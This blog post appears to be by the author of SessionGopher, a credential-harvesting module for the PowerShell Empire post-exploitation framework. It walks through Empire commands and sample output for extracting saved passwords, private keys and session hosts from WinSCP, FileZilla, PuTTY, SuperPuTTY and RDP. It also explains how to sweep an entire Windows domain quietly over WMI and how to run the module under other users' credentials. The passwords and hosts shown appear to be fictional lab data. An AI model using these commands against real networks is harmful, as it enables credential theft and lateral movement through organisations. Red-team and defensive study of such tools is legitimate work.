New in PowerShell Empire 2.0: SessionGopher

By Brandon Arvanaghi @arvanaghi

SessionGopher is now part of PowerShell Empire 2.0. Here’s how to use the module.

Some background: SessionGopher is a PowerShell WinSCP, RDP, FileZilla, PuTTY, SuperPuTTY, .rdp, .ppk, .stdid saved session and password extractor. It automatically deobfuscates and finds passwords for these tools where applicable, and helps you find Unix systems and jump boxes.

Once you have your agent, all there’s left to do is run

(Empire: [agent]) > usemodule credentials/sessiongopher
(Empire: powershell/credentials/sessiongopher) > run

          o_       
         /  ".   SessionGopher
       ,"  _-"      
     ,"   m m         
  ..+     )      Brandon Arvanaghi
     `m..m       Twitter: @arvanaghi | arvanaghi.com

WinSCP Sessions

Source   : WIN7-BARVANAGHI\ProfessorX
Session  : adm-angela@192.168.43.21
Hostname : 192.168.43.21
Username : adm-angela
Password : dw!ghtB33ts

FileZilla Sessions

Source   : WIN7-BARVANAGHI\ProfessorX
Name     : Affiliate Jump Box
Password : d3ad0nb4lls@ccurat3
Host     : 198.143.22.9
User     : MonaLisaVito
Protocol : Use SFTP
Port     : 22

Microsoft Remote Desktop (RDP) Sessions

Source   : WIN7-BARVANAGHI\ProfessorX
Hostname : dc01
Username : CORP\ProfessorX

Source   : WIN7-BARVANAGHI\ProfessorX
Hostname : exchange001
Username : CORP\ProfessorX

PuTTY Sessions

Source   : WIN7-BARVANAGHI\ProfessorX
Session  : Point of Sale Device
Hostname : 10.25.84.31

SuperPuTTY Sessions

Source        : WIN7-BARVANAGHI\DrOctopus
SessionId     : Design Computer
SessionName   : Design Computer
Host          : 192.168.20.166
Username      : root
ExtraArgs     : -pw kleen3x41
Port          : 22
Putty Session : Default Settings

Running as admin allows SessionGopher to extract sessions for every single domain user who has ever logged on to that host. This is done by querying the HKEY_USERS hive, which contains subkeys for all users who have ever had interactive sessions on that host. These subkeys store saved session information for these tools regardless of whether the user is logged in, and while admin accounts can access every subkey on the system, non-privileged accounts can only access their own.

Query remote hosts using WMI

To run SessionGopher against remote hosts from your agent, use one of the Target, AllDomain, or iL arguments. All three use WMI to query the remote hosts in question, so they run quietly. Note that all three of these arguments require admin privileges on the remote hosts they query.

AllDomain (switch)

This is where the magic happens. AllDomain runs SessionGopher across every computer in the domain, effectively providing a mapping of the entire domain for you through saved sessions. Beyond credentials, the output of AllDomain should yield the locations of jump boxes and Unix systems in the environment.

(Empire: powershell/credentials/sessiongopher) > set AllDomain True
(Empire: powershell/credentials/sessiongopher) > run

[+] Digging on DC02...

Microsoft RDP Sessions

Source   : DC02\Professorx
Hostname : dc01
Username : CORP\ProfessorX

[+] Digging on WEB01...
[+] Digging on MAIL01...
[+] Digging on WIN7-CLIENT03...

WinSCP Sessions

Source   : WIN7-CLIENT03\JimmyMcGill
Session  : saulgoodman@192.168.14.80
Hostname : 192.168.14.80
Username : saulgoodman
Password : gravit4s

Microsoft RDP Sessions

Source   : WIN7-CLIENT03\JimmyMcGill
Hostname : 10.20.30.35
Username : CORP\Saul.Goodman

PuTTY Sessions

Source   : WIN7-CLIENT03\MikeEhrmantraut
Session  : Cash_Register
Hostname : 10.14.21.90

... etc ...

Target

Target runs SessionGopher against a specific remote host you provide.

(Empire: powershell/credentials/sessiongopher) > set Target WIN7-CLIENT01.corp.com
(Empire: powershell/credentials/sessiongopher) > run

... output ...

iL

To specify a set of hosts to run against, provide a path to a .txt file on the beaconing host which contains hostnames separated by newlines.

(Empire: powershell/credentials/sessiongopher) > set iL C:\Users\Professor X\Tmp\hosts.txt
(Empire: powershell/credentials/sessiongopher) > run

... output ...

Additional arguments

Thorough (switch)

Use Thorough in combination with any other set of arguments to search the entire filesystem for .rdp, .ppk, and .stdid files. Since it searches the entire filesystem, it is not recommended you use Thorough when querying more than a few hosts at a time. Thorough output automatically parses .ppk and .rdp files and extracts the relevant session details and private key, like so:

(Empire: powershell/credentials/sessiongopher) > set Thorough True
(Empire: powershell/credentials/sessiongopher) > run

PuTTY Private Key Files (.ppk)

Path                   : C:\Users\Brandon Arvanaghi\Documents\mykey.ppk
Protocol               : ssh-rsa
Comment                : rsa-key-20170116
Private Key Encryption : none
Private Key            : {AAABAEazxtDz6E9mDeONOmz07sG/n1eS1pjKI8fOCuuLnQC58LeCTlysOmZ1/iC4, g4HyRpmdKJGhIxj66/	RQ135hVesyk02StleepK4+Tnvz3zmdr4Do5W99qKkrWI3D, T9GOxOIoR9Zc6j57D+fdesJq4ItEIxcQZlXC1F9KZcbXjSJ3iBmCsbG/aRJmMJNx, 
                         nCMaZkySr4R4Z/E+l1JOzXaHh5WQ2P0K4YM1/6XG6C4VzDjvXwcY67MYsobTeCR2...}
Private MAC            : b7e47819fee39a95eb374a97f939c3c868f880de


Microsoft Remote Desktop .rdp Files

Path                    : C:\Users\Brandon Arvanaghi\Desktop\config\PenTestLab-Win.RDP
Hostname                : dc01.corp.hackerplaypen.com
Gateway                 : rds01.corp.hackerplaypen.com
Prompts for Credentials : No
Administrative Session  : Does not connect to admin session on remote host

... output ...

u and p

To run in the context of a different user account than the context of the beaconing agent, you can specify a username and password.

(Empire: powershell/credentials/sessiongopher) > set u CORP\Bruce.Wayne
(Empire: powershell/credentials/sessiongopher) > set p ImB@tm@n43~
(Empire: powershell/credentials/sessiongopher) > run

... output ...

To see all these options together, enter options.

(Empire: powershell/credentials/sessiongopher) > options

  Name      Required    Value       Description
  ----      --------    -------     -----------
  p         False                   Password for user account (if -u        
                                    argument provided).                     
  u         False                   User account (e.g. corp.com\jerry) for  
                                    when using -Target, -iL, or -AllDomain. 
                                    If not provided, uses current security  
                                    context.                                
  Thorough  False                   Switch. Searches entire filesystem for  
                                    .ppk, .rdp, .sdtid files. Not           
                                    recommended to use with -AllDomain due  
                                    to time.                                
  o         False                   Switch. Drops a folder of all output in 
                                    .csvs on remote host.                   
  AllDomain False                   Switch. Run against all computers on    
                                    domain. Uses current security context,  
                                    unless -u and -p arguments provided.    
                                    Uses WMI.                               
  iL        False                   Provide path to a .txt file on the      
                                    remote host containing hosts separated  
                                    by newlines to run remotely against.    
                                    Uses WMI.                               
  Agent     True        Z9TU5F4A    Agent to run module on.                 
  Target    False                   Provide a single host to run remotely   
                                    against. Uses WMI.

I built SessionGopher for simplicity, so you can expect to run without setting any values and still get interesting output. Again, running as admin is preferred.

Have fun, and let me know how it goes!